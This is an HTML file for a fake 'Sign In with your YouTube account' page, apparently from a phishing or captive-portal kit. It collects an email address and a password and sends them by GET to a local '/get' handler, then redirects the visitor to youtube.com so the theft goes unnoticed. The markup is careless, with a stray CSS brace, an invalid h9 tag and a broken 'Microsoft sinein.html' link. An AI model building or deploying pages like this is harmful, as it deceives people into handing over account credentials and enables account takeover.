<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;
            margin: 0;
            padding: 0;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .container {
            max-width: 400px;
            padding: 25px;
            margin: auto;
        }
        .form {
            max-width: 300px;
            padding: 20px;
            border: 1px solid #cccccc;
            border-radius: 5px;
            margin: 0 auto;
        }
        h1 {
            text-align: center;
            color: #ffffff;
        }
       
        }
        button[type="submit"] {
            width: 100%;
            background-color: #0067b8;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        button[type="submit"]:hover {
            background-color: #005299;
        }
        svg {
            display: block;
            margin: 0 auto;
            width: 150px;
            height: 150px;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://i.imgur.com/qys3KUS.png" onclick="location.href='https://youtube.com'"
        width="320"
        height="140">
  
        <form action="/get" method="get" id="email-form-step" class="form">
            <h1>Sign In with<br>your YouTube account</h1>
            <input name="email" type="text" placeholder="Email" required>
            <input name="password" type="password" placeholder="Password" required>
            <button type="submit" onclick="location.href='https://youtube.com'" >Sign In</button>
            <h9>                                or<h9>
            <button type="submit" onclick="location.href='Microsoft sinein.html'" >Sign Up</button>
        </form>
    </div>
</body>
</html>
